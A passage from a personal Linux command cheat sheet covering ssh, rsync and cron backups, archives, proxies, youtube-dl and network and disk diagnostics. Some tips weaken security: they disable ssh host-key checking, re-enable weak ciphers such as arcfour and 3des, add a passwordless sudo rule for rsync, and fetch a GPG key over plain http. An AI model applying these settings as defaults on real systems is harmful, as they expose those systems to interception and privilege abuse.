$ mkfifo /tmp/testfifo
$ tail -f /tmp/testfifo

and in another console:

$ echo HELLO! > /tmp/testfifo
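A named pipe can also stand in for a file between two otherwise unrelated programs; a small sketch (the paths here are arbitrary examples):

$ mkfifo /tmp/logpipe
$ gzip -c < /tmp/logpipe > /tmp/out.gz &    # reader: compress whatever arrives on the pipe
$ echo "some data" > /tmp/logpipe           # writer: feed data through the pipe
$ rm /tmp/logpipe                           # the FIFO persists until it is deleted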

30.1.16 Give Privilege to a non-root process to bind to ports under 1024

setcap 'cap_net_bind_service=+ep' $(readlink -f `which python` )
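As a quick check (a sketch; port 80, python3 and http.server are only examples), the interpreter can bind a privileged port without sudo once the capability is granted:

$ sudo setcap 'cap_net_bind_service=+ep' $(readlink -f `which python3`)
$ python3 -m http.server 80                        # binds port 80 as a normal user
$ sudo setcap -r $(readlink -f `which python3`)    # remove the capability again when done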

30.1.17 How do I test whether a number is prime? http://www.madboa.com/geek/openssl/#prime-test

$ openssl prime 119054759245460753
1A6F7AC39A53511 is not prime

You can also pass hex numbers directly.

$ openssl prime -hex 2f
2F is prime

30.1.18 Download from YouTube https://github.com/rg3/youtube-dl


# apt-get install youtube-dl

$ youtube-dl https://www.youtube.com/watch?v=video_id --proxy http://host:port
$ youtube-dl -v -i --no-mtime --no-check-certificate --youtube-skip-dash-manifest https://www.youtube.com/watch?v=video_id

30.1.19 How to use youtube-dl from a python program

import youtube_dl

url = raw_input('URL:')
dl = youtube_dl.YoutubeDL({'outtmpl': u'%(id)s.mp4',
                           'forceduration': True,
                           'restrictfilenames': True,
                           'format': '18/22/5',
                           'writesubtitles': True})
res = dl.extract_info(url)
duration = res['duration']
title = res['title']
vid = res['id']
ext = res['ext']
web_page_url = res['webpage_url']
subtitles = res['subtitles']

Youtube options: https://github.com/rg3/youtube-dl/blob/1ad6b891b21b45830736698a7b59c30d9605a562/youtube_dl/__init__.py#L290

30.1.20 Download Youtube videos with Youtube subtitles on

# To download sub
$ youtube-dl --no-mtime --proxy http://127.0.0.1:8080 -f 18 --write-sub URL
# To embed sub
$ youtube-dl --no-mtime --proxy http://127.0.0.1:8080 -f 18 --embed-subs URL

30.1.21 Redirect output to null

$ echo 123 > /dev/null 2>&1

30.1.22 cron

You do not have to restart cron every time you make a change, because cron always checks for changes. But if you do want to restart cron after making a change:

$ sudo service crond restart

In Ubuntu:


$ sudo service cron status $ sudo service cron restart

Display the current crontab:

$ crontab -l

Edit the current crontab:

$ crontab -e

Syntax of crontab (field description)

* * * * * /path/to/command arg1 arg2

* * * * *  command to be executed
- - - - -
| | | | |
| | | | +----- Day of week (0 - 7) (Sunday = 0 or 7)
| | | +------- Month (1 - 12)
| | +--------- Day of month (1 - 31)
| +----------- Hour (0 - 23)
+------------- Minute (0 - 59)

How do I use operators?

An operator allows you to specify multiple values in a field. There are four operators:

The asterisk (*): This operator specifies all possible values for a field. For example, an asterisk in the hour field would be equivalent to every hour, and an asterisk in the month field would be equivalent to every month.

The comma (,): This operator specifies a list of values, for example: "1,5,10,15,20,25".

The dash (-): This operator specifies a range of values, for example: "5-15" days, which is equivalent to typing "5,6,7,8,9,...,13,14,15" using the comma operator.

The separator (/): This operator specifies a step value, for example: "0-23/2" can be used in the hours field to specify command execution every other hour. Steps are also permitted after an asterisk, so if you want to say every two hours, just use */2.

Resources:

http://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
http://www.thegeekstuff.com/2011/12/crontab-command/
http://www.computerhope.com/unix/ucrontab.htm
http://crontab.guru/
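A few illustrative crontab entries combining these operators (the paths are hypothetical):

# every 15 minutes
*/15 * * * * /home/or/bin/check.sh
# at 02:30 on weekdays (Monday to Friday)
30 2 * * 1-5 /home/or/bin/backup.sh
# at minute 0 of hours 9, 12 and 18, only in January and July
0 9,12,18 * 1,7 * /home/or/bin/report.sh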

30.1.23 Generate random base64 characters

$ openssl rand -base64 741


30.1.24 Set Socket Buffer Sizes

# sysctl -w net.core.rmem_max=2096304
# sysctl -w net.core.wmem_max=2096304

30.1.25 Ping

-s packetsize
   Specifies the number of data bytes to be sent. The default is 56, which translates into 64 ICMP data bytes when combined with the 8 bytes (in my local system, 28 bytes) of ICMP header data.

-M pmtudisc_opt
   Select Path MTU Discovery strategy. pmtudisc_option may be either do (prohibit fragmentation, even local one), want (do PMTU discovery, fragment locally when packet size is large), or dont (do not set DF flag).

# ping -c 1 -M do -s 1472 google.com
PING google.com (173.194.113.167) 1472(1500) bytes of data.
1480 bytes from www.google.com (173.194.113.167): icmp_seq=1 ttl=42 time=262 ms

--- google.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 262.920/262.920/262.920/0.000 ms

30.1.26 Change owner of directory

$ chown -R or:or .

30.1.27 Locate/print block device attributes

# blkid
/dev/sda6: UUID="2fc31bf0-68f1-4566-975b-cb995277db10" TYPE="swap"
/dev/sda1: UUID="ec3c1569-29bb-4a63-bd75-337c57c7b600" TYPE="ext4"

30.1.28 Create a new UUID value

$ uuidgen
d2ad5b28-b306-4096-aca2-dd66c37da5af

30.1.29 SSH

# socks5 proxy with dynamic tcp/ip port forwarding
$ ssh -D 8080 user@remote_host

$ ssh -L 8080:localhost:80 user@remote_host


# connect to a program running on the remote host, for example TinyProxy
$ ssh -N user@remote_host -L 8080:localhost:8888

30.1.30 Secure copy

$ scp -r Prj username@remote_ip:/directory/path/in/remote/ip/

30.1.31 Install SSH server and SSH client

$ sudo apt-get install openssh-server
$ sudo apt-get install openssh-client

https://wiki.debian.org/SSH

30.1.32 Create a new ssh key

$ ssh-keygen -t rsa -C "[email protected]"
Generating public/private rsa key pair.
Enter file in which to save the key (/home/or/.ssh/id_rsa): /home/or/.ssh/bitbucket_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/or/.ssh/bitbucket_rsa.
Your public key has been saved in /home/or/.ssh/bitbucket_rsa.pub.

$ ssh-add ~/.ssh/bitbucket_rsa

$ vim ~/.ssh/config
IdentityFile ~/.ssh/bitbucket_rsa

$ chmod 400 ~/.ssh/bitbucket_rsa

30.1.33 SSH connection with public key

$ vim ~/.ssh/authorized_keys # add public key

30.1.34 Disable the Password for Root Login

$ sudo vim /etc/ssh/sshd_config
PasswordAuthentication no

$ sudo /etc/init.d/ssh restart

30.1.35 Youtube download trick

$ youtube-dl --no-mtime --verbose -i 'ytsearch100:table tennis training' --get-title
$ youtube-dl --no-mtime --verbose -i 'ytsearch100:table tennis training'


30.1.36 Run process as background and never die

$ nohup node server.js > /dev/null 2>&1 &
$ ./run.py > /dev/null 2>&1 &

1. nohup means: Do not terminate this process even when the stty is cut off.
2. > /dev/null means: stdout goes to /dev/null (which is a dummy device that does not record any output).
3. 2>&1 means: stderr also goes to stdout (which is already redirected to /dev/null).
4. & at the end means: run this command as a background task.
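If you prefer to keep the output for later debugging instead of discarding it, redirect to a file (the log file name here is arbitrary):

$ nohup ./run.py > run.log 2>&1 &
$ tail -f run.log    # watch the output of the detached process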

30.1.37 Eject CD/DVD-ROM

eject - eject removable media

$ eject
$ eject -t

-t With this option the drive is given a CD-ROM tray close command. Not all devices support this command.

30.1.38 Search for a package

$ apt-cache search package_name

30.1.39 Un mount cd-rom device that is busy error

# umount /cdrom
# fuser -km /cdrom
# umount -l /mnt

30.1.40 Login with linux FTP username and password

$ ftp ftp://username:[email protected]

30.1.41 Download torrent

$ aria2c download.torrent

30.1.42 Debug SSH

# ssh -vT [email protected]


30.1.43 Detect ssh authentication types available

$ ssh -o PreferredAuthentications=none 127.0.0.1
Permission denied (publickey,password).

$ ssh -o PreferredAuthentications=none 127.0.0.2
Permission denied (publickey).

$ ssh -o PreferredAuthentications=none 127.0.0.3
Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password).

http://stackoverflow.com/questions/3585586/how-can-i-programmatically-detect-ssh-authentication-types-available

30.1.44 Avoid SSH's host verification for known hosts?

$ ssh -o "StrictHostKeyChecking no" 127.0.0.1

http://superuser.com/questions/125324/how-can-i-avoid-sshs-host-verification-for-known-hosts

30.1.45 Set environment variables on linux

$ export PATH=${PATH}:/home/or/bin

30.1.46 Base64 decode encode

or@debian:~$ echo 'Test' | base64
VGVzdAo=
or@debian:~$ echo 'Test' | base64 | base64 -d
Test

30.1.47 Extract compressed files

# Decompress a file that was created using the gzip command.
# The file is restored to its original form by this command.
$ gzip -d mydata.doc.gz
$ gunzip mydata.doc.gz

# Decompress a file that was created using the bzip2 command.
# The file is restored to its original form by this command.
$ bzip2 -d mydata.doc.bz2
$ bunzip2 mydata.doc.bz2

# Extract compressed files from a ZIP archive.
$ unzip file.zip
$ unzip data.zip resume.doc

# Untar or decompress file(s) that were created using tar with the gzip or bzip2 filter
$ tar -zxvf data.tgz


$ tar -zxvf pics.tar.gz *.jpg
$ tar -jxvf data.tbz2

# Extract a tar file to another directory
$ tar -xvf archive.tar -C /target/directory

# List files in a GZIP archive
$ gzip -l mydata.doc.gz

# List files in a ZIP archive
$ unzip -l mydata.zip

# List files in a TAR archive
$ tar -ztvf pics.tar.gz
$ tar -jtvf data.tbz2

# To unzip a file that is only compressed with bz2 use
$ bunzip2 filename.bz2

# To unzip things that are compressed with .tar.bz2 use
$ tar -xvjpf filename.tar.bz2

# To unzip things that are compressed with .gz use
$ gunzip file.doc.gz

# Don't store full absolute paths in the archive.
# This archives the `/home/or/ws/data` directory into `data.tar` without the absolute path.
$ tar -cf data.tar -C /home/or/ws/ data

Options for tar files:

tar xvzf file-1.0.tar.gz   - to uncompress a gzip tar file (.tgz or .tar.gz)
tar xvjf file-1.0.tar.bz2  - to uncompress a bzip2 tar file (.tbz or .tar.bz2)
tar xvf file-1.0.tar       - to uncompress a plain tar file (.tar)

x = eXtract, this indicates an extraction
c = create (to create an archive)
v = verbose (optional), the files with relative locations will be displayed
z = gzip-ped
j = bzip2-zipped
f = from/to file ... (what comes after the f is the archive file)

The files will be extracted in the current folder. HINT: if you know that a file has to be in a certain folder, move to that folder first. Then download, then uncompress - all in the correct folder. Yes, I'm lazy.. no I don't like to copy files between directories, and then delete others to clean up. Download them in the correct directory and save yourself 2 jobs.
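As a complementary example (the file names and the --exclude pattern are only illustrative), creating an archive works the same way with c instead of x:

# create a gzip-compressed archive of a directory, skipping *.log files
$ tar -czvf backup.tar.gz --exclude='*.log' /home/or/ws/data
# list its contents without extracting
$ tar -tzvf backup.tar.gz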

30.1.48 List All Environment Variables

$ env

$ printenv

$ printenv | less

$ printenv | more


30.1.49 Set Environment variable

$ export MY_VAR="my_val"

30.1.50 Set proxy in command line

$ export http_proxy="http://127.0.0.1:8080"
$ export https_proxy="https://127.0.0.1:8080"
$ export ftp_proxy="http://127.0.0.1:8080"

30.1.51 How can I tunnel all of my network traffic through SSH? http://superuser.com/questions/62303/how-can-i-tunnel-all-of-my-network-traffic-through-ssh

$ sudo sshuttle --dns -vvr username@remote_host 0/0

30.1.52 How can you completely remove a package? http://askubuntu.com/questions/151941/how-can-you-completely-remove-a-package

$ sudo apt-get purge package_name

This does not remove packages that were installed as dependencies, when you installed the package you’re now removing. Assuming those packages aren’t dependencies of any other packages, and that you haven’t marked them as manually installed, you can remove the dependencies with:

$ sudo apt-get autoremove

or (if you want to delete their systemwide configuration files too):

$ sudo apt-get --purge autoremove

30.1.53 How to forward X over SSH from Ubuntu machine

http://unix.stackexchange.com/questions/12755/how-to-forward-x-over-ssh-from-ubuntu-machine

X11 forwarding needs to be enabled on both the client side and the server side.

On the client side, the -X (capital X) option to ssh enables X11 forwarding, and you can make this the default (for all connections or for a specific connection) with ForwardX11 yes in ~/.ssh/config.

On the server side, edit the /etc/ssh/sshd_config file, and uncomment the following line:

X11Forwarding Yes

The xauth program must be installed on the server side.


$ aptitude install xauth

After making this change, you will need to restart the SSH server. To do this on most UNIX’s, run:

$ /etc/init.d/sshd restart

To confirm that ssh is forwarding X11, Check for a line containing Requesting X11 forwarding in the output:

$ ssh -v -X USER@SERVER

Note that the server won’t reply either way.

30.1.54 SOCKS server and/or client

http://www.delegate.org/delegate/SOCKS/
http://ajitabhpandey.info/2011/03/delegate-a-multi-platform-multi-purpose-proxy-server/

Download delegate from http://delegate.hpcc.jp/anonftp/DeleGate/bin/linux/latest/ and extract it. Then run the binary as follows.

Run an HTTP proxy that is connected to a SOCKS proxy:

$ ./dg9_9_13 -P8080 SERVER=http SOCKS=127.0.0.1:9150 ADMIN="[email protected]"

$ youtube-dl -v --proxy "http://127.0.0.1:8080" https://www.youtube.com/watch?v=VID

30.1.55 SSH hangs on debug1: expecting SSH2_MSG_KEX_ECDH_REPLY

Edit /etc/ssh/ssh_config, uncomment the following lines

Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc
GSSAPIAuthentication yes
GSSAPIDelegateCredentials no
MACs hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160

Add the following line:

HostKeyAlgorithms ssh-rsa,ssh-dss

Changing the MTU may also help:

ifconfig eth0 mtu 578

http://superuser.com/questions/699530/git-pull-does-nothing-git-push-just-hangs-debug1-expecting-ssh2-msg-kex-ecd

30.1.56 What will this command do?

$ exec 2>&1


The number 1 refers to stdout and the number 2 refers to stderr; exec 2>&1 duplicates (copies) stderr onto stdout. When you run a program, you'll get the normal output on stdout, but any errors or warnings usually go to stderr. If you want to pipe all output to a file, for example, it's useful to first combine stderr with stdout using 2>&1.

http://stackoverflow.com/questions/1216922/sh-command-exec-21
http://www.catonmat.net/blog/bash-one-liners-explained-part-three/
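A common use is at the top of a shell script, so that everything the script prints, including errors, ends up in one log file; a minimal sketch (the log file name is arbitrary):

#!/usr/bin/env bash
# send all subsequent stdout and stderr of this script to script.log
exec > script.log 2>&1
echo "this goes to the log"
ls /nonexistent    # this error message goes to the same log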

30.1.57 Sample guake script

$ vim /home/or/workspace/bin/start.guake.sh

guake -r "OR";
guake -n New_Tab -r "root" -e "su";
guake -n New_Tab -r "Ipython 2" -e "ipython";
guake -n New_Tab -r "workspace" -e "cd /home/or/workspace/;clear;";
guake -n New_Tab -r "prj" -e "cd /home/or/workspace/prj/;clear;";
guake -n New_Tab -r "dg" -e "cd /home/or/workspace/Tools/dg/dg9_9_13/DGROOT/bin/;clear;";

$ chmod +x /home/or/workspace/bin/start.guake.sh

30.1.58 Verify that apt is pulling from the right repository

$ apt-cache policy

Example:

$ apt-cache policy docker-engine

Output:

Installed: 1.9.1-0~stretch
Candidate: 1.9.1-0~stretch
Version table:
*** 1.9.1-0~stretch 500
      500 https://apt.dockerproject.org/repo debian-stretch/main amd64 Packages
      100 /var/lib/dpkg/status
    1.9.0-0~stretch 500
      500 https://apt.dockerproject.org/repo debian-stretch/main amd64 Packages
    1.8.3-0~stretch 500
      500 https://apt.dockerproject.org/repo debian-stretch/main amd64 Packages
    1.8.2-0~stretch 500
      500 https://apt.dockerproject.org/repo debian-stretch/main amd64 Packages
    1.8.1-0~stretch 500
      500 https://apt.dockerproject.org/repo debian-stretch/main amd64 Packages
    1.8.0-0~stretch 500
      500 https://apt.dockerproject.org/repo debian-stretch/main amd64 Packages
    1.7.1-0~stretch 500
      500 https://apt.dockerproject.org/repo debian-stretch/main amd64 Packages
    1.7.0-0~stretch 500
      500 https://apt.dockerproject.org/repo debian-stretch/main amd64 Packages
    1.6.2-0~stretch 500
      500 https://apt.dockerproject.org/repo debian-stretch/main amd64 Packages
    1.6.1-0~stretch 500
      500 https://apt.dockerproject.org/repo debian-stretch/main amd64 Packages
    1.6.0-0~stretch 500
      500 https://apt.dockerproject.org/repo debian-stretch/main amd64 Packages
    1.5.0-0~stretch 500
      500 https://apt.dockerproject.org/repo debian-stretch/main amd64 Packages

30.1.59 Operation not permitted on file with root access

# ls -la /etc/resolv.conf
-r--r--r-- 1 root root 56 Jan 7 22:39 /etc/resolv.conf

# chmod u+rwx /etc/resolv.conf
chmod: changing permissions of '/etc/resolv.conf': Operation not permitted

# lsattr /etc/resolv.conf
----i------e-- /etc/resolv.conf

# chattr -i /etc/resolv.conf
# lsattr /etc/resolv.conf
------------e-- /etc/resolv.conf

30.1.60 rsync and sudo over SSH

Add the line <username> ALL=NOPASSWD:<path to rsync> to the sudoers file, where <username> is the login name of the user that rsync will use to log on. That user must be able to use sudo.

Note: Put the line after all other lines in the sudoers file! I first added the line after other user configurations, but it only worked when placed as the absolutely last line in the file on lubuntu 14.04.1.

$ sudo visudo
<username> ALL=NOPASSWD:<path to rsync>

Example:

$ which rsync
/usr/bin/rsync



$ sudo visudo
ubuntu ALL=NOPASSWD:/usr/bin/rsync

https://askubuntu.com/a/719440
http://stackoverflow.com/questions/21659637/how-to-fix-sudo-no-tty-present-and-no-askpass-program-specified-error

30.1.61 How to backup with rsync

$ rsync -avz -e ssh --rsync-path="sudo rsync" <username>@<remote_host>:/path/on/remote/host/to/backup /path/on/local/host/to/save/backup

Using rsync for local backups

$ rsync -av --delete /Directory1/ /Directory2/

-a        recursive (recurse into directories), links (copy symlinks as symlinks), perms (preserve permissions), times (preserve modification times), group (preserve group), owner (preserve owner), preserve device files, and preserve special files.

-v        verbose. The reason I think verbose is important is so you can see exactly what rsync is backing up. Think about this: What if your hard drive is going bad, and starts deleting files without your knowledge, then you run your rsync script and it pushes those changes to your backups, thereby deleting all instances of a file that you did not want to get rid of?

--delete  This tells rsync to delete any files that are in Directory2 that aren't in Directory1. If you choose to use this option, I recommend also using the verbose option, for the reasons mentioned above.
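Since --delete removes files on the destination side, it can be worth previewing the transfer with -n/--dry-run first (a sketch; the directories are the same placeholders as above):

# show what would be copied and deleted, without changing anything
$ rsync -avn --delete /Directory1/ /Directory2/
# then run it for real
$ rsync -av --delete /Directory1/ /Directory2/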

30.1.62 Full Daily Backup with Syncing Hourly Backup by rsync and cron

$ crontab -e

0 */2 * * * hourly_sync_backup.sh
0 */8 * * * daily_full_archive_backup.sh

$ service cron restart

$ vim hourly_sync_backup.sh

rsync -avz -e ssh --rsync-path="sudo rsync" <username>@<remote_host>:/path/on/remote/host/to/backup /path/on/local/host/to/save/hourly_sync_backup

$ vim daily_full_archive_backup.sh

rsync -avz -e ssh --rsync-path="sudo rsync" <username>@<remote_host>:/path/on/remote/host/to/backup /path/on/local/host/to/save/daily_full_archive_backup
tar -P -cvjf /path/on/local/host/to/save/archives/daily_full_archive_backup_$(date +%Y_%m_%d).tar.bz2 /path/on/local/host/to/save/daily_full_archive_backup

30.1.63 Backup with rsync works but not in crontab

$ rsync -avze "ssh -i ~/.ssh/my_key" ...

http://www.howtogeek.com/135533/how-to-use-rsync-to-backup-your-data-on-linux/?PageSpeed=noscript
https://www.marksanborn.net/howto/use-rsync-for-daily-weekly-and-full-monthly-backups/

30.1.64 Sample ssh config file

$ vim ~/.ssh/config

Host <alias>
    HostName <hostname>
    User <username>
    IdentityFile ~/.ssh/<name>_key

Host gb
    HostName github.com
    User omidraha
    IdentityFile ~/.ssh/github_key

$ ssh gb

30.1.65 Compress directory

$ tar -zcvf archive-name.tar.gz directory-name

Where:

-z : Compress the archive using the gzip program
-c : Create archive
-v : Verbose, i.e. display progress while creating the archive
-f : Archive file name

http://www.cyberciti.biz/faq/how-do-i-compress-a-whole-linux-or-unix-directory/

30.1.66 How to add path of a program to $PATH environment variable?

Edit .bashrc in your home directory and add the following line:

$ vim ~/.bashrc
export PATH="/path/to/dir:$PATH"
$ source ~/.bashrc

30.1.67 Could not open a connection to your authentication agent

$ eval `ssh-agent -s`

http://stackoverflow.com/a/17848593


30.1.68 How do I make ls show file sizes in megabytes?

$ ls -l --block-size=M
$ ls -lh

http://unix.stackexchange.com/a/64150

30.1.69 How to check if a file exists at a specific path?

#!/usr/bin/env bash
if test -f /path/to/some/file; then
    echo "File exists"
fi

Or to check that a file does not exist:

#!/usr/bin/env bash
if test ! -f /path/to/some/file; then
    echo "File does not exist"
fi

30.1.70 what does echo $$, $? $# mean ?

$ echo $$, $?, $#, $*

$$ is the PID of the current process.
$? is the return code of the last executed command.
$# is the number of arguments in $*.
$* is the list of arguments passed to the current process.

http://www.unix.com/shell-programming-and-scripting/75297-what-does-echo-mean.html
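A small script makes the difference visible (a sketch; save it as vars.sh and run ./vars.sh one two three):

#!/usr/bin/env bash
echo "PID of this script:        $$"
echo "Number of arguments:       $#"
echo "All arguments:             $*"
false
echo "Exit code of last command: $?"   # prints 1, the exit status of 'false'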

30.1.71 Make ZSH the default shell

$ chsh -s $(which zsh)

30.1.72 ulimit

The ulimit and sysctl programs allow you to limit system-wide resource use. This can help a lot in system administration, e.g. when a user starts too many processes and therefore makes the system unresponsive for other users.

$ ulimit -a
core file size          (blocks, -c) 0
data seg size           (kbytes, -d) unlimited
scheduling priority             (-e) 0
file size               (blocks, -f) unlimited
pending signals                 (-i) 63619
max locked memory       (kbytes, -l) 64
max memory size         (kbytes, -m) unlimited
open files                      (-n) 65536
pipe size            (512 bytes, -p) 8
POSIX message queues     (bytes, -q) 819200
real-time priority              (-r) 0
stack size              (kbytes, -s) 8192
cpu time               (seconds, -t) unlimited
max user processes              (-u) 63619
virtual memory          (kbytes, -v) unlimited
file locks                      (-x) unlimited

$ sudo sysctl -a

www.linuxhowtos.org/Tips and Tricks/ulimit.htm
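For example, to raise the open-files limit for the current shell only, or permanently for a specific user via /etc/security/limits.conf (the user name and value here are just examples):

# current shell only
$ ulimit -n 65536

# permanent, per user, in /etc/security/limits.conf (takes effect on next login)
or  soft  nofile  65536
or  hard  nofile  65536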

30.1.73 locate

$ sudo apt-get install mlocate
$ updatedb
$ locate some-resource-name

30.1.74 Posting Form Data with cURL

Start your cURL command with curl -X POST and then add -F for every field=value you want to add to the POST:

$ curl -X POST -F 'username=or' -F 'password=pass' http://domain.tld/post

30.1.75 Diff

Eskil is a graphical tool to view the differences between files and directories http://eskil.tcl.tk/index.html/doc/trunk/htdocs/download.html

30.1.76 Telegram

telegram-cli resolve_username tabletennis

https://github.com/luckydonald/pytg/issues/64

30.1.77 Convert Socks into an HTTP proxy

$ sudo apt-get install polipo
$ sudo service polipo stop

$ sudo vim /etc/polipo/config



logSyslog = true
logFile = /var/log/polipo/polipo.log

# HTTP Proxy
proxyAddress = "0.0.0.0"
proxyPort = 8080

# Socks Proxy
socksParentProxy = "127.0.0.1:9150"
socksProxyType = socks5

chunkHighMark = 50331648
objectHighMark = 16384

serverMaxSlots = 64
serverSlots = 16
serverSlots1 = 32

$ sudo service polipo restart

30.1.78 How to use sshuttle

$ sshuttle -r username@sshserver 0/0

http://sshuttle.readthedocs.io/en/stable/usage.html#usage

30.1.79 locale.Error: unsupported locale setting

$ export LC_ALL="en_US.UTF-8"
$ export LC_CTYPE="en_US.UTF-8"
$ sudo dpkg-reconfigure locales

https://stackoverflow.com/a/36257050

30.1.80 Shadowsocks

$ sudo pip install shadowsocks
$ sudo ssserver -c ~/ws/shadowproxy.json --user nobody -d start

30.1.81 Capture and recording screen

$ sudo apt-get install byzanz
$ byzanz-record -d 60 record.gif

30.1.82 Inotify Watches Limit

$ vim /etc/sysctl.conf
fs.inotify.max_user_watches = 524288


$ sudo sysctl -p --system

https://confluence.jetbrains.com/display/IDEADEV/Inotify+Watches+Limit

30.1.83 Monitor multiple remote log files with MultiTail

$ sudo apt-get install multitail

# example for two log files
$ multitail log-file_a log-file_b

# example for two log files and two columns
$ multitail -s 2 log-file_a log-file_a

# example for two log files and different colors
$ multitail -ci green log-file_a -ci yellow -I log-file_a

# example for one log file on a remote host
$ multitail -l "ssh -t <user>@<host> tail -f log-file"

# example for two log files on remote hosts
$ multitail -l "ssh -t <user>@<host> tail -f log-file_a" -l "ssh -t <user>@<host> tail -f log-file_b"

30.1.84 Register GPG key by curl instead of dirmngr

$ sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys D6BC243565B2087BC3F897C9277A7293F59E4889

Error traceback:

Executing: /tmp/apt-key-gpghome.voccUPwlky/gpg.1.sh --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys D6BC243565B2087BC3F897C9277A7293F59E4889
gpg: connecting dirmngr at '/run/user/0/gnupg/d.k4bafrtss9g1d86f8y5rxb8h/S.dirmngr' failed: IPC connect call failed
gpg: keyserver receive failed: No dirmngr

Note: add the 0x prefix before the key, e.g. 0x5523BAEEB01FA116.

$ curl -sL "http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x5523BAEEB01FA116" | sudo apt-key add -

30.1.85 Install fonts

$ sudo apt-get install font-manager

$ font-manager


30.1.86 Install tzdata noninteractive

$ apt-get install -y tzdata
$ ln -fs /usr/share/zoneinfo/Asia/Tehran /etc/localtime
$ dpkg-reconfigure --frontend noninteractive tzdata

If you are fine with UTC:

$ DEBIAN_FRONTEND=noninteractive apt-get install -y tzdata

30.1.87 Inotify Watches Limit

Error: External file changes sync may be slow: the current inotify watch limit is too low.

Fix:

$ vim /etc/sysctl.conf

fs.inotify.max_user_watches= 524288

$ sudo sysctl -p --system

https://confluence.jetbrains.com/display/IDEADEV/Inotify+Watches+Limit

30.2 Network

30.2.1 Watch network connections

$ watch ss -tp

30.2.2 Established connections

$ netstat
$ lsof -i

30.2.3 Tcp connections

$ netstat -ant # -anu=udp

30.2.4 Connections with PIDs

$ netstat -tulpn


30.2.5 List of listening ports

$ netstat -uanp

30.2.6 Capture packets

$ sudo apt-get install tcpdump
$ sudo tcpdump -i wlan0 src port 80 or dst port 80

$ sudo apt-get install tshark
$ tshark -i any

http://jvns.ca/blog/2016/03/16/tcpdump-is-amazing/

30.2.7 Change the default gateway

$ sudo route del default
$ sudo route add default gw 192.168.1.115

Or:

$ vim /etc/network/interfaces

auto eth0
iface eth0 inet static
    address 192.168.1.119
    netmask 255.255.255.0
    broadcast 192.168.1.255
    gateway 192.168.1.115
    dns-nameservers 8.8.8.8 8.8.4.4

30.2.8 Set a static IP

$ vim /etc/network/interfaces

allow-hotplug eth0
iface eth0 inet static
    address 192.168.1.119
    netmask 255.255.255.0
    broadcast 192.168.1.255
    gateway 192.168.1.115
    dns-nameservers 8.8.8.8 8.8.4.4

30.2.9 How do I install dig?

$ sudo apt-get install dnsutils


30.2.10 Monitor bandwidth usage per process

$ sudo apt-get install nethogs
$ nethogs -a

$ sudo apt-get install iptraf
$ sudo iptraf-ng

$ watch -n1 netstat -tunap

https://askubuntu.com/questions/532424/how-to-monitor-bandwidth-usage-per-process

30.2.11 Show your gateway

$ route -ne

30.2.12 Disable IP6

$ sudo vim /etc/sysctl.conf
net.ipv6.conf.all.disable_ipv6=1
net.ipv6.conf.default.disable_ipv6=1
net.ipv6.conf.lo.disable_ipv6=1

$ sudo sysctl -p

30.2.13 Number of open connections per ip

$ netstat -ntu | awk -F"[ :]+" 'NR>2{print $6}'|sort|uniq -c|sort -nr

Specific port:

$ netstat -ntu | grep ":80\|:443" | awk -F"[ :]+" '{print $6}'|sort|uniq -c|sort -nr

Or:

$ netstat -na | grep ":443\|:80" | grep -v LISTEN | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -rn | head

Output:

14 23.43.29.1
12 76.55.52.34
 4 8.3.2.34
 1 192.163.2.42
 1 172.53.43.87

30.2.14 Connections types:

$ netstat -ant | awk 'NR>1{print $6}' | sort | uniq -c | sort -rn


Output:

93 ESTABLISHED
15 TIME_WAIT
15 LISTEN
 1 SYN_SENT
 1 Foreign
 1 CLOSE_WAIT

30.3 Hard

30.3.1 Commands to check hard disk partitions and disk space on Linux

http://www.binarytides.com/linux-command-check-disk-partitions/

df

Df is not a partitioning utility, but prints out details about only mounted file systems. The list generated by df even includes file systems that are not real disk partitions. Here is a simple example

$ df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/sda6        97G   43G   49G  48% /
none            4.0K     0  4.0K   0% /sys/fs/cgroup
udev            3.9G  8.0K  3.9G   1% /dev
                799M  1.7M  797M   1% /run
none            5.0M     0  5.0M   0% /run/lock
none            3.9G   12M  3.9G   1% /run/shm
none            100M   20K  100M   1% /run/user
/dev/sda8       196G  154G   33G  83% /media/13f35f59-f023-4d98-b06f-9dfaebefd6c1
/dev/sda5        98G   37G   62G  38% /media/4668484A68483B47

Only the file systems that start with a /dev are actual devices or partitions. Use grep to filter out real hard disk partitions/file systems.

$ df -h | grep ^/dev
/dev/sda6        97G   43G   49G  48% /
/dev/sda8       196G  154G   33G  83% /media/13f35f59-f023-4d98-b06f-9dfaebefd6c1
/dev/sda5        98G   37G   62G  38% /media/4668484A68483B47

To display only real disk partitions along with partition type, use df like this

$ df -h --output=source,fstype,size,used,avail,pcent,target -x tmpfs -x devtmpfs
Filesystem     Type     Size  Used Avail Use% Mounted on
/dev/sda6      ext4      97G   43G   49G  48% /
/dev/sda8      ext4     196G  154G   33G  83% /media/13f35f59-f023-4d98-b06f-9dfaebefd6c1
/dev/sda5      fuseblk   98G   37G   62G  38% /media/4668484A68483B47

Note that df shows only the mounted file systems or partitions and not all.

lsblk

Lists out all the storage blocks, which includes disk partitions and optical drives. Details include the total size of the partition/block and the mount point if any. Does not report the used/free disk space on the partitions.

$ lsblk
NAME   MAJ:MIN RM   SIZE RO TYPE MOUNTPOINT
sda      8:0    0 465.8G  0 disk
sda1     8:1    0    70G  0 part
sda2     8:2    0     1K  0 part
sda5     8:5    0  97.7G  0 part /media/4668484A68483B47
sda6     8:6    0  97.7G  0 part /
sda7     8:7    0   1.9G  0 part [SWAP]
sda8     8:8    0 198.5G  0 part /media/13f35f59-f023-4d98-b06f-9dfaebefd6c1
sdb      8:16   1   3.8G  0 disk
sdb1     8:17   1   3.8G  0 part
sr0     11:0    1  1024M  0 rom

If there is no MOUNTPOINT, then it means that the file system is not yet mounted. For cd/dvd this means that there is no disk. Lsblk is capable of displaying more information about each device, like the label and model.

blkid

Prints the block device (partitions and storage media) attributes like uuid and file system type. Does not report the space on the partitions.

